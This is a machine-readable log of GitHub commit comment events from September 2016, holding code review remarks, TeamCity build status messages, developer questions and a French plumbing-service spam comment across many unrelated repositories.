{"id":"4526893624","type":"CommitCommentEvent","actor":{"login":"Plombier94"},"repo":{"name":"openlayers/ol3"},"payload":{"comment":{"id":18926504,"position":null,"line":null,"path":null,"commit_id":"14c9212992cef101f6938f2ea537ba200d556c88","created_at":"2016-09-07T10:57:36Z","updated_at":"2016-09-07T10:57:36Z","body":"Bienvenue chez L’artisanat\r\n\r\nNotre équipe de plomberie est disponible à votre service 24/24 et 7/7 avec le bon prix. \r\nMerci de consulter notre site .\r\n>>>>[http://plombier94.urgenceartisanpascher.com/](http://plombier94.urgenceartisanpascher.com/)\r\nPlombier Créteil\r\n>>>>[http://plombiercreteil.urgenceartisanpascher.com/](http://plombiercreteil.urgenceartisanpascher.com/)\r\nTrouver une société de plomberie via le net est une solution à la fois rapide et d’une grande simplicité.\r\nVous envisager rénover votre équipement sanitaire et vous cherchez un plombier pas cher Créteil de qualité affichant un prix raisonnable et disponible en permanence 24H/24et 7J/7 \r\nVous êtes à la bonne adresse ! Notre plombier pas cher Créteil qualifié et certifié, vous garantisse une prestation de qualité et à moindre coût. Quel que soit votre problème en matière de plomberie sur Créteil : Notre artisan plombier assurera rapidement le dépannage.\r\n"}},"created_at":"2016-09-07T10:57:36Z"}
{"id":"4526895024","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18926508,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T10:57:54Z","updated_at":"2016-09-07T10:57:54Z","body":"![avatar](https://cloud.githubusercontent.com/assets/3807921/18309636/b0338972-74fa-11e6-938f-fcf02d2a5fd6.jpg)\r\n"}},"created_at":"2016-09-07T10:57:54Z"}
{"id":"4526897068","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18926513,"position":null,"line":null,"path":null,"commit_id":"2d65afb60d43a71475d598a2ac5cbc3bf205dc90","created_at":"2016-09-07T10:58:20Z","updated_at":"2016-09-07T10:58:20Z","body":"Need a no-more-table.css : by core or template only ?"}},"created_at":"2016-09-07T10:58:20Z"}
{"id":"4526898367","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926514,"position":null,"line":null,"path":null,"commit_id":"0d1cea1a9df60b26925a2c0e67f3c5ff786338a3","created_at":"2016-09-07T10:58:39Z","updated_at":"2016-09-07T10:58:39Z","body":"TeamCity Ms Demo :: Build [Build 31](http://10.22.17.95:8111/viewLog.html?buildId=56&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T10:58:39Z"}
{"id":"4526899725","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18926516,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T10:58:57Z","updated_at":"2016-09-07T10:58:57Z","body":"![lalala](http://ujlipot.vakvarju.com/data/napimenu/20.jpg?v=1473152550)\r\n"}},"created_at":"2016-09-07T10:58:57Z"}
{"id":"4526900165","type":"CommitCommentEvent","actor":{"login":"adriweb"},"repo":{"name":"CE-Programming/toolchain"},"payload":{"comment":{"id":18926518,"position":241,"line":1887,"path":"CEdev/lib/src/libraries/graphics_src/graphx/v2/graphics_lib.asm","commit_id":"7d3e9d7969b130e24a4706e8791fa5e7ac669428","created_at":"2016-09-07T10:59:02Z","updated_at":"2016-09-07T10:59:02Z","body":"?"}},"created_at":"2016-09-07T10:59:02Z"}
{"id":"4526901505","type":"CommitCommentEvent","actor":{"login":"adriweb"},"repo":{"name":"CE-Programming/toolchain"},"payload":{"comment":{"id":18926520,"position":242,"line":1888,"path":"CEdev/lib/src/libraries/graphics_src/graphx/v2/graphics_lib.asm","commit_id":"7d3e9d7969b130e24a4706e8791fa5e7ac669428","created_at":"2016-09-07T10:59:20Z","updated_at":"2016-09-07T10:59:20Z","body":"Also ?"}},"created_at":"2016-09-07T10:59:20Z"}
{"id":"4526902058","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926521,"position":null,"line":null,"path":null,"commit_id":"0d1cea1a9df60b26925a2c0e67f3c5ff786338a3","created_at":"2016-09-07T10:59:28Z","updated_at":"2016-09-07T10:59:28Z","body":"TeamCity Ms Demo :: Build [Build 31](http://10.22.17.95:8111/viewLog.html?buildId=56&buildTypeId=MsDemo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 6 Build time: 00:00:51"}},"created_at":"2016-09-07T10:59:28Z"}
{"id":"4526902321","type":"CommitCommentEvent","actor":{"login":"wonderwoman13"},"repo":{"name":"jmuldvp/blocitoff"},"payload":{"comment":{"id":18926522,"position":4,"line":3,"path":"app/controllers/users_controller.rb","commit_id":"16a15dc5b12b66c81d4dbaa7793af0a7543ef0c6","created_at":"2016-09-07T10:59:32Z","updated_at":"2016-09-07T10:59:32Z","body":"@jmuldvp, here is where I added in current_user"}},"created_at":"2016-09-07T10:59:32Z"}
{"id":"4526902644","type":"CommitCommentEvent","actor":{"login":"leggetter"},"repo":{"name":"Nexmo/nexmo-node"},"payload":{"comment":{"id":18926523,"position":7,"line":47,"path":"package.json","commit_id":"15ea4953a7fac2dfd57a0b48f72fa54e1354679a","created_at":"2016-09-07T10:59:37Z","updated_at":"2016-09-07T10:59:37Z","body":"Yeah, everybody that wants to use Voice now or any other API going forward will require it."}},"created_at":"2016-09-07T10:59:37Z"}
{"id":"4526902781","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18926524,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T10:59:39Z","updated_at":"2016-09-07T10:59:39Z","body":"Great\nStuff"}},"created_at":"2016-09-07T10:59:39Z"}
{"id":"4526904511","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18926531,"position":null,"line":null,"path":null,"commit_id":"fab1732c570e294063f71bd05a3dc28fabe2c0b0","created_at":"2016-09-07T11:00:03Z","updated_at":"2016-09-07T11:00:03Z","body":"Referencing gradle/build-tool-web#12 here, as no reference was put in the original commit comment.\r\n\r\nThis is another one for the style guide (gradle/build-tool-web#92): put issue references in all commit comments. This is, in general, a good practice, but it has particular practical value for us, as we can look at the issue's activity stream and see which new commits have been made, and which of those commits have comments, making it much easier to move through reviews."}},"created_at":"2016-09-07T11:00:03Z"}
{"id":"4526904778","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18926532,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T11:00:07Z","updated_at":"2016-09-07T11:00:07Z","body":"lalala\n![asd](http://ujlipot.vakvarju.com/data/napimenu/20.jpg?v=1473152550)\nfff"}},"created_at":"2016-09-07T11:00:07Z"}
{"id":"4526905631","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18926533,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-07T11:00:18Z","updated_at":"2016-09-07T11:00:18Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.160](http://build.clear-measure.com/viewLog.html?buildId=10387&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-07T11:00:18Z"}
{"id":"4526906878","type":"CommitCommentEvent","actor":{"login":"Sjbishoyi"},"repo":{"name":"Sjbishoyi/Libyary-Management"},"payload":{"comment":{"id":18926535,"position":null,"line":null,"path":null,"commit_id":"c9451bf8af8c3525f603f633fa7e0560d0fbe999","created_at":"2016-09-07T11:00:34Z","updated_at":"2016-09-07T11:00:34Z","body":"Ready to Go."}},"created_at":"2016-09-07T11:00:34Z"}
{"id":"4526907325","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18926536,"position":null,"line":null,"path":null,"commit_id":"a03726b272e23b2da6d0c68ceea4c2fb7bbf9e20","created_at":"2016-09-07T11:00:40Z","updated_at":"2016-09-07T11:00:40Z","body":"See gradle/build-tool-web#12"}},"created_at":"2016-09-07T11:00:40Z"}
{"id":"4526909063","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18926537,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-07T11:01:00Z","updated_at":"2016-09-07T11:01:00Z","body":"@snicolet, thanks for the code. I will probably give one last try by adding bishop and rook threats similar to the one below(with pawn/knight/bishop):\r\nhttp://tests.stockfishchess.org/tests/view/57ce56930ebc59030fbe4f68\r\nAnd then I'll call it a day!"}},"created_at":"2016-09-07T11:01:00Z"}
{"id":"4526913034","type":"CommitCommentEvent","actor":{"login":"augustoamerico"},"repo":{"name":"rstudio/bookdown-demo"},"payload":{"comment":{"id":18926543,"position":null,"line":null,"path":null,"commit_id":"23ba576aa59b84b0e2b3b07be7fcf60e655985b8","created_at":"2016-09-07T11:01:55Z","updated_at":"2016-09-07T11:01:55Z","body":"I can't run this example successfuly. I've downloaded the svmono.cls and spbasic.bst under the root directory but still I'm having problems.\r\nWhen running \r\n```\r\n\"C:/Program Files/RStudio/bin/pandoc/pandoc\" +RTS -K512m -RTS bookdown-demo-changed.utf8.md --to latex --from markdown+autolink_bare_uris+ascii_identifiers+tex_math_single_backslash --output bookdown-demo-changed.pdf --template \"C:\\Users\\Altran\\Documents\\R\\win-library\\3.3\\rmarkdown\\rmd\\latex\\default-1.17.0.2.tex\" --highlight-style tango --latex-engine pdflatex --variable graphics=yes --variable \"geometry:margin=1in\" --bibliography book.bib --bibliography packages.bib --filter pandoc-citeproc \r\n```\r\n\r\nI get the following error:\r\n```\r\n! LaTeX Error: Command \\subtitle already defined.\r\n               Or name \\end... illegal, see p.192 of the manual.\r\n\r\nSee the LaTeX manual or LaTeX Companion for explanation.\r\nType  H <return>  for immediate help.\r\n ...                                              \r\n                                                  \r\nl.116 }\r\n\r\npandoc.exe: Error producing PDF\r\nError: pandoc document conversion failed with error 43\r\nIn addition: Warning message:\r\nrunning command '\"C:/Program Files/RStudio/bin/pandoc/pandoc\" +RTS -K512m -RTS bookdown-demo-changed.utf8.md --to latex --from markdown+autolink_bare_uris+ascii_identifiers+tex_math_single_backslash --output bookdown-demo-changed.pdf --template \"C:\\Users\\Altran\\Documents\\R\\win-library\\3.3\\rmarkdown\\rmd\\latex\\default-1.17.0.2.tex\" --highlight-style tango --latex-engine pdflatex --variable graphics=yes --variable \"geometry:margin=1in\" --bibliography book.bib --bibliography packages.bib --filter pandoc-citeproc' had status 43 \r\n```\r\n\r\nIn order to understand the error a little bit better, I've deleted the following lines from the default-1.17.0.2.tex:\r\n```\r\n\\newcommand{\\subtitle}[1]{\r\n  \\posttitle{\r\n    \\begin{center}\\large#1\\end{center}\r\n    }\r\n}\r\n```\r\n\r\nAnd I don't have an error anymore. But the output is not like the one that you [shared](https://github.com/rstudio/bookdown/releases/download/v0.1/bookdown-demo-springer-svmono.pdf)\r\n\r\nWhat am I doing wrong?"}},"created_at":"2016-09-07T11:01:55Z"}
{"id":"4526913490","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18926544,"position":null,"line":null,"path":null,"commit_id":"4e5ce632abc3fb503300b685ff24868852ad9781","created_at":"2016-09-07T11:01:59Z","updated_at":"2016-09-07T11:01:59Z","body":"Just tell me Alex.\n\nOn Tue, Sep 6, 2016 at 11:07 PM, JoinRajuncraftNow <notifications@github.com\n> wrote:\n\n> That is another bug that can be easily fixed. I am on mobile, so I can't\n> fix right now. I will fix it tomorrow.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/JoinRajuncraftNow/Projects/commit/4e5ce632abc3fb503300b685ff24868852ad9781#commitcomment-18922441>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQMOna7yoXNnW1B1xOAh0m4fJWGhq_Ysks5qnipYgaJpZM4J2L2e>\n> .\n>\n"}},"created_at":"2016-09-07T11:01:59Z"}
{"id":"4526916311","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18926547,"position":24,"line":68,"path":"README.adoc","commit_id":"96ef2c8f4da5cb2d7cfe86debd8b71771f875a57","created_at":"2016-09-07T11:02:38Z","updated_at":"2016-09-07T11:02:38Z","body":"It was a mistake. I meant to leave the word \"in\". It's back now, as of commit 5b7810c8a2b854de988949cf437b78f6603bbcdd. Thanks."}},"created_at":"2016-09-07T11:02:38Z"}
{"id":"4526917028","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18926550,"position":null,"line":null,"path":null,"commit_id":"37f60ab60812a874345aa83b4b3cca3d0e2bd8e5","created_at":"2016-09-07T11:02:49Z","updated_at":"2016-09-07T11:02:49Z","body":"no need !empty and != \"\" :)"}},"created_at":"2016-09-07T11:02:49Z"}
{"id":"4526917578","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":18926552,"position":5,"line":49,"path":"mail_tracking/models/mail_message.py","commit_id":"07a28ceee46c73cf33d0895cd3bb20d7514f7a1b","created_at":"2016-09-07T11:02:56Z","updated_at":"2016-09-07T11:02:56Z","body":"Is `_order` correct for getting last status?"}},"created_at":"2016-09-07T11:02:56Z"}
{"id":"4526918076","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18926554,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-07T11:03:03Z","updated_at":"2016-09-07T11:03:03Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.160](http://build.clear-measure.com/viewLog.html?buildId=10387&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:44"}},"created_at":"2016-09-07T11:03:03Z"}
{"id":"4526922211","type":"CommitCommentEvent","actor":{"login":"aleksgrunwald"},"repo":{"name":"aleksgrunwald/cats_dogs_layouts"},"payload":{"comment":{"id":18926562,"position":4,"line":11,"path":"CatsDogs/app/src/main/res/layout/activity_main.xml","commit_id":"c0d9f214dd3e1dfa217aa8acf51e0da2448a643e","created_at":"2016-09-07T11:04:01Z","updated_at":"2016-09-07T11:04:01Z","body":"Hej,\n\nCzy mogłabym zaległe i nowe prace domowe przesłać do wtorku następnego? Mam\nnapięty terminarz... :/\n\n\npzdr,\nOla\n\n2016-08-30 23:43 GMT+02:00 tomaszchabinka <notifications@github.com>:\n\n> lepiej użyć LinearLayout lub po prostu samego TextView\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/aleksgrunwald/cats_dogs_layouts/commit/c0d9f214dd3e1dfa217aa8acf51e0da2448a643e#commitcomment-18836740>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AUFkFs6VqohwsBnR-kN-IlKGCP7OQ-qlks5qlKQVgaJpZM4JxAsE>\n> .\n>\n"}},"created_at":"2016-09-07T11:04:01Z"}
{"id":"4526923454","type":"CommitCommentEvent","actor":{"login":"reneleite"},"repo":{"name":"paulolieuthier/MiniAds"},"payload":{"comment":{"id":18926566,"position":null,"line":null,"path":null,"commit_id":"d3b9fc9bdd0c3ba98bddfa0114964a71dd18990f","created_at":"2016-09-07T11:04:20Z","updated_at":"2016-09-07T11:04:20Z","body":"O correto seria\r\nAdd placeholder and pattern to targetings' places field"}},"created_at":"2016-09-07T11:04:20Z"}
{"id":"4526928593","type":"CommitCommentEvent","actor":{"login":"ta2-1"},"repo":{"name":"ta2-1/pootle"},"payload":{"comment":{"id":18926578,"position":null,"line":null,"path":null,"commit_id":"5bbef91fac7fbbb943f085556608018d350f8185","created_at":"2016-09-07T11:05:35Z","updated_at":"2016-09-07T11:05:35Z","body":"Yes, I needed array of values and now I'm not sure what is difference between:\r\n\r\n```\r\nunit.source_f.strings|to_js\r\n```\r\nand\r\n```\r\nunit.source_f|to_js\r\n```"}},"created_at":"2016-09-07T11:05:35Z"}
{"id":"4526930198","type":"CommitCommentEvent","actor":{"login":"reneleite"},"repo":{"name":"paulolieuthier/MiniAds"},"payload":{"comment":{"id":18926584,"position":null,"line":null,"path":null,"commit_id":"b04a034a2777e05d346e8124891492b261b73342","created_at":"2016-09-07T11:05:56Z","updated_at":"2016-09-07T11:05:56Z","body":"Escreveu bem!"}},"created_at":"2016-09-07T11:05:56Z"}
{"id":"4526934191","type":"CommitCommentEvent","actor":{"login":"l0rd"},"repo":{"name":"dharmit/che"},"payload":{"comment":{"id":18926600,"position":46,"line":46,"path":"Dockerfile.centos","commit_id":"2ab1f19d23cd4dd176e60ecbe68e7e1ba56c822b","created_at":"2016-09-07T11:06:52Z","updated_at":"2016-09-07T11:06:52Z","body":"In this case you don't have to create the group. You can just add the user\nto ftp group.\n\nOn Wednesday, 7 September 2016, Dharmit Shah <notifications@github.com>\nwrote:\n\n> @l0rd <https://github.com/l0rd> on CentOS 7 image, GID 50 is reserved for\n> FTP which prevents me from adding a group for docker4mac with GID 50. Is\n> it absolutely required to keep it GID 50?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dharmit/che/commit/2ab1f19d23cd4dd176e60ecbe68e7e1ba56c822b#commitcomment-18924832>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAlC74ivP6MnlBqulOHPyc5zXBmDFE9sks5qnnhKgaJpZM4J056E>\n> .\n>\n"}},"created_at":"2016-09-07T11:06:52Z"}
{"id":"4526935196","type":"CommitCommentEvent","actor":{"login":"InuSasha"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18926605,"position":4,"line":13439,"path":"addons/resource.language.en_gb/resources/strings.po","commit_id":"ec5b24d9ecd6a99939a52b4e32e2ece712b04bab","created_at":"2016-09-07T11:07:07Z","updated_at":"2016-09-07T11:07:07Z","body":"removing was wrong, didn't it?\r\nIt should replaced by (behind the new msg-block):\r\n#empty strings from id 21846 to 21856"}},"created_at":"2016-09-07T11:07:07Z"}
{"id":"4526935288","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926606,"position":null,"line":null,"path":null,"commit_id":"0d1cea1a9df60b26925a2c0e67f3c5ff786338a3","created_at":"2016-09-07T11:07:09Z","updated_at":"2016-09-07T11:07:09Z","body":"TeamCity Ms Demo :: Build [Build 32](http://10.22.17.95:8111/viewLog.html?buildId=57&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T11:07:09Z"}
{"id":"4526936100","type":"CommitCommentEvent","actor":{"login":"akhachaturan"},"repo":{"name":"akhachaturan/test_code_collab"},"payload":{"comment":{"id":18926607,"position":null,"line":null,"path":null,"commit_id":"c00876182f8d32b3c7691b2f5aa84bf5db07d429","created_at":"2016-09-07T11:07:18Z","updated_at":"2016-09-07T11:07:18Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://10.6.241.144:8080/ui/ui#review:id=1)"}},"created_at":"2016-09-07T11:07:18Z"}
{"id":"4526937060","type":"CommitCommentEvent","actor":{"login":"solkimicreb"},"repo":{"name":"vivekimsit/nx-framework"},"payload":{"comment":{"id":18926609,"position":null,"line":null,"path":null,"commit_id":"c0812965a1c817710e0388cefe4706f9ed186171","created_at":"2016-09-07T11:07:31Z","updated_at":"2016-09-07T11:07:31Z","body":"Nope, I don't think it will change the external API. Although removing the custom `show` attribute from the style middleware would be nice if we can make the native `hidden` work. It would be duplicated functionality."}},"created_at":"2016-09-07T11:07:31Z"}
{"id":"4526939078","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926616,"position":null,"line":null,"path":null,"commit_id":"0d1cea1a9df60b26925a2c0e67f3c5ff786338a3","created_at":"2016-09-07T11:07:58Z","updated_at":"2016-09-07T11:07:58Z","body":"TeamCity Ms Demo :: Build [Build 32](http://10.22.17.95:8111/viewLog.html?buildId=57&buildTypeId=MsDemo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 6 Build time: 00:00:50"}},"created_at":"2016-09-07T11:07:58Z"}
{"id":"4526941395","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18926622,"position":null,"line":null,"path":null,"commit_id":"63c4c0469a30c9429aabe5edd32e107d6c85456e","created_at":"2016-09-07T11:08:32Z","updated_at":"2016-09-07T11:08:32Z","body":"Ok, let's continue with this approach for now, i.e. prefer single-quotes where it's possible to use them.\r\n\r\nWe'll document it as such in the style guide, and we can then bring it to the larger engineering group for a referendum. If we decide to go double-quotes all the way as a result, we can take a single pass over all the guides and make it so."}},"created_at":"2016-09-07T11:08:32Z"}
{"id":"4526941591","type":"CommitCommentEvent","actor":{"login":"Technowix"},"repo":{"name":"Freeyourgadget/Gadgetbridge"},"payload":{"comment":{"id":18926623,"position":null,"line":null,"path":null,"commit_id":"41b20b8c574216493c912588e9d441e6fc0410e4","created_at":"2016-09-07T11:08:34Z","updated_at":"2016-09-07T11:08:34Z","body":"No problems :D"}},"created_at":"2016-09-07T11:08:34Z"}
{"id":"4526943035","type":"CommitCommentEvent","actor":{"login":"hweidi"},"repo":{"name":"hweidi/hello-world"},"payload":{"comment":{"id":18926624,"position":1,"line":1,"path":"README.md","commit_id":"04a396409c7e99cc1e83dc86c9459125f9c863b5","created_at":"2016-09-07T11:08:54Z","updated_at":"2016-09-07T11:08:54Z","body":"readme tst"}},"created_at":"2016-09-07T11:08:54Z"}
{"id":"4526943399","type":"CommitCommentEvent","actor":{"login":"Poshwosh"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18926627,"position":null,"line":null,"path":null,"commit_id":"60a6253143b2d0f345735a8d7701596f250d3c4c","created_at":"2016-09-07T11:09:00Z","updated_at":"2016-09-07T11:09:00Z","body":"Just my opinion, I don't think the average player would find this useful to be enabled by default. Modifications have been about QoL tweaks, the devcat effects can feel a little alien in comparison."}},"created_at":"2016-09-07T11:09:00Z"}
{"id":"4526951527","type":"CommitCommentEvent","actor":{"login":"j-selby"},"repo":{"name":"Dragios/Citra"},"payload":{"comment":{"id":18926642,"position":null,"line":null,"path":null,"commit_id":"0c633b13fe7909a05b6e34182fd8ce970e3ca636","created_at":"2016-09-07T11:10:51Z","updated_at":"2016-09-07T11:10:51Z","body":"This won't work - input_width gets converted (unchecked) to a boolean, so a non-zero value evaluates as true. If you want to use this approach, use something like this:\r\n\r\n    if (input_width > 0 && output_width > 0) {"}},"created_at":"2016-09-07T11:10:51Z"}
{"id":"4526953605","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18926647,"position":5,"line":27,"path":"build.gradle","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T11:11:20Z","updated_at":"2016-09-07T11:11:20Z","body":"Ok, so let's continue with \"Language Reference\" for now. We'll add it to the style guide as such, and just like the \"single quotes\" question and other potential matters of debate, we can bring these up in a controlled fashion to the rest of engineering and get some consensus on them. In the meantime, I like erring on the side of \"Language Reference\", because it will serve as a constant reminder that we need to get that consensus, and it avoids us falling into the trap of just going with current inertia around the \"DSL\" term and forgetting about the need to revisit it in the long run.\r\n"}},"created_at":"2016-09-07T11:11:20Z"}
{"id":"4526961192","type":"CommitCommentEvent","actor":{"login":"adishavit"},"repo":{"name":"adishavit/argh"},"payload":{"comment":{"id":18926664,"position":null,"line":null,"path":null,"commit_id":"05ef8f264759dbe75c9818baf2df7d59862f1e7f","created_at":"2016-09-07T11:13:04Z","updated_at":"2016-09-07T11:13:04Z","body":"Handles #4 ."}},"created_at":"2016-09-07T11:13:04Z"}
{"id":"4526963797","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18926669,"position":null,"line":null,"path":null,"commit_id":"e468813fc032c5558eb3f384b2d886e919d7515b","created_at":"2016-09-07T11:13:36Z","updated_at":"2016-09-07T11:13:36Z","body":"- [ ] This is a test"}},"created_at":"2016-09-07T11:13:36Z"}
{"id":"4526969895","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18926683,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T11:15:00Z","updated_at":"2016-09-07T11:15:00Z","body":"lalala\n![asd](http://ujlipot.vakvarju.com/data/napimenu/20.jpg?v=1473152550)\nfff"}},"created_at":"2016-09-07T11:15:00Z"}
{"id":"4526971907","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18926692,"position":null,"line":null,"path":null,"commit_id":"4e5ce632abc3fb503300b685ff24868852ad9781","created_at":"2016-09-07T11:15:26Z","updated_at":"2016-09-07T11:15:26Z","body":"I've already fixed the negative damage bug."}},"created_at":"2016-09-07T11:15:26Z"}
{"id":"4526975587","type":"CommitCommentEvent","actor":{"login":"wa4557"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18926702,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T11:16:15Z","updated_at":"2016-09-07T11:16:15Z","body":"What happens if you remove `Numix/scalable/status/network-cellular-*`?"}},"created_at":"2016-09-07T11:16:15Z"}
{"id":"4526979808","type":"CommitCommentEvent","actor":{"login":"intgr"},"repo":{"name":"2ndQuadrant/mysqlcompat"},"payload":{"comment":{"id":18926710,"position":7,"line":6,"path":"META.json","commit_id":"d046e393a90ddb8a5c79d281ed306f1080c58406","created_at":"2016-09-07T11:17:13Z","updated_at":"2016-09-07T11:17:13Z","body":"There's still a lot of broken and iffy code in this project, that's why I didn't declare it stable."}},"created_at":"2016-09-07T11:17:13Z"}
{"id":"4526984283","type":"CommitCommentEvent","actor":{"login":"salmamao"},"repo":{"name":"salmamao/MockAPP"},"payload":{"comment":{"id":18926714,"position":null,"line":null,"path":null,"commit_id":"2baf2b04f75fbd6728c437534d15f39dd421bd0f","created_at":"2016-09-07T11:18:11Z","updated_at":"2016-09-07T11:18:11Z","body":"hadchi ziin llay3tik se7a ^^"}},"created_at":"2016-09-07T11:18:11Z"}
{"id":"4526986871","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926719,"position":null,"line":null,"path":null,"commit_id":"0d1cea1a9df60b26925a2c0e67f3c5ff786338a3","created_at":"2016-09-07T11:18:45Z","updated_at":"2016-09-07T11:18:45Z","body":"TeamCity Ms Demo :: Build [Build 33](http://10.22.17.95:8111/viewLog.html?buildId=58&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T11:18:45Z"}
{"id":"4526988101","type":"CommitCommentEvent","actor":{"login":"pdias-cci"},"repo":{"name":"costaivo/MEAN-EmployeeReview"},"payload":{"comment":{"id":18926722,"position":8,"line":22,"path":"server/app/routes/skill.js","commit_id":"dca6d95e2d18e5b4cc8c464683cb129a8b976dd1","created_at":"2016-09-07T11:19:02Z","updated_at":"2016-09-07T11:19:02Z","body":"> // API to search for a skill in databse\r\n**databse** should be **database**"}},"created_at":"2016-09-07T11:19:02Z"}
{"id":"4526989219","type":"CommitCommentEvent","actor":{"login":"iversonlee"},"repo":{"name":"iversonlee/Treasure"},"payload":{"comment":{"id":18926725,"position":null,"line":null,"path":null,"commit_id":"0c076621e2d58c0eb00eabc26b348afecbac5a6f","created_at":"2016-09-07T11:19:17Z","updated_at":"2016-09-07T11:19:17Z","body":"强者世界"}},"created_at":"2016-09-07T11:19:17Z"}
{"id":"4526990139","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926727,"position":null,"line":null,"path":null,"commit_id":"0d1cea1a9df60b26925a2c0e67f3c5ff786338a3","created_at":"2016-09-07T11:19:29Z","updated_at":"2016-09-07T11:19:29Z","body":"TeamCity Ms Demo :: Build [Build 33](http://10.22.17.95:8111/viewLog.html?buildId=58&buildTypeId=MsDemo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 6 Build time: 00:00:45"}},"created_at":"2016-09-07T11:19:29Z"}
